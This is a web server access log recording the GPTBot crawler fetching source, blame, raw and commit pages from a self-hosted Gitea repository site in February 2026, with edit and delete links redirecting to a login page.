"https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md" +[17/Feb/2026:16:26:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md" [Client 74.7.227.38] [Length 22588] [Gzip 12.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md" +[17/Feb/2026:16:26:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" [Client 74.7.227.38] [Length 12632] [Gzip 6.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" +[17/Feb/2026:16:26:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" [Client 74.7.227.38] [Length 9955] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" +[17/Feb/2026:16:26:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:16:26:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/compare/main...main" [Client 74.7.227.38] [Length 8396] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/compare/main...main?expand=1" +[17/Feb/2026:16:26:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/compare/main..main" [Client 74.7.227.38] [Length 8373] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/compare/main...main?expand=1" +[17/Feb/2026:16:26:19 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcConnectionTest/Program.cs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/Program.cs" +[17/Feb/2026:16:26:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcConnectionTest/Program.cs" +[17/Feb/2026:16:26:20 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcConnectionTest/Program.cs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/Program.cs" +[17/Feb/2026:16:26:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcConnectionTest/Program.cs" +[17/Feb/2026:16:26:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcConnectionTest/Program.cs" [Client 74.7.227.38] [Length 9808] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/Program.cs" +[17/Feb/2026:16:26:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 10079] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:16:26:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md" [Client 74.7.227.38] [Length 8781] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md" +[17/Feb/2026:16:26:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md" +[17/Feb/2026:16:26:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md" +[17/Feb/2026:16:26:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md" +[17/Feb/2026:16:26:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md" +[17/Feb/2026:16:26:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 85] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:16:26:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 9955] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:16:26:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" [Client 74.7.227.38] [Length 2115] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" +[17/Feb/2026:16:26:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 11311] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:16:26:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 558] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:16:26:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcConnectionTest/Program.cs" [Client 74.7.227.38] [Length 903] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/Program.cs" +[17/Feb/2026:16:26:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcConnectionTest/Program.cs" [Client 74.7.227.38] [Length 6440] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/Program.cs" +[17/Feb/2026:16:26:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/OpcConnectionTest/Program.cs" [Client 74.7.227.38] [Length 18644] [Gzip 11.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/Program.cs" +[17/Feb/2026:16:26:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 13515] [Gzip 4.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old" +[17/Feb/2026:16:26:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 13550] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old" +[17/Feb/2026:16:26:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 13550] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old" +[17/Feb/2026:16:26:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 13550] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old" +[17/Feb/2026:16:26:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10455] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:16:26:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/metadata.json" +[17/Feb/2026:16:26:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/metadata.json" +[17/Feb/2026:16:26:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2fbuild%2fPostgresPatrol%2fPYZ-00.toc" [Client 74.7.227.38] [Length 33641] [Gzip 12.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PYZ-00.toc" +[17/Feb/2026:16:26:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2fbuild%2fPostgresPatrol%2fPKG-00.toc" [Client 74.7.227.38] [Length 23794] [Gzip 5.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PKG-00.toc" +[17/Feb/2026:16:26:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2fbuild%2fPostgresPatrol%2fAnalysis-00.toc" [Client 74.7.227.38] [Length 19940] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/Analysis-00.toc" +[17/Feb/2026:16:26:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2fbuild%2fPostgresPatrol%2fPYZ-00.pyz" [Client 74.7.227.38] [Length 19781] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PYZ-00.pyz" +[17/Feb/2026:16:26:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcConnectionTest/Program.cs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcConnectionTest/Program.cs" +[17/Feb/2026:16:26:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcConnectionTest/Program.cs" +[17/Feb/2026:16:26:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 9950] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old_codec.cpp" +[17/Feb/2026:16:26:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcConnectionTest/Program.cs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcConnectionTest/Program.cs" +[17/Feb/2026:16:26:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcConnectionTest/Program.cs" +[17/Feb/2026:16:26:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 9976] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old_codec.cpp" +[17/Feb/2026:16:26:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 9978] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old_codec.cpp" +[17/Feb/2026:16:26:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15250] [Gzip 5.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:26:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 11600] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:26:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 11044] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:26:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 9976] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old_codec.cpp" +[17/Feb/2026:16:26:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 9949] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:26:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 2228] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old_codec.cpp" +[17/Feb/2026:16:26:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 2228] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old_codec.cpp" +[17/Feb/2026:16:26:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 14028] [Gzip 7.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old_codec.cpp" +[17/Feb/2026:16:26:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 2228] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; 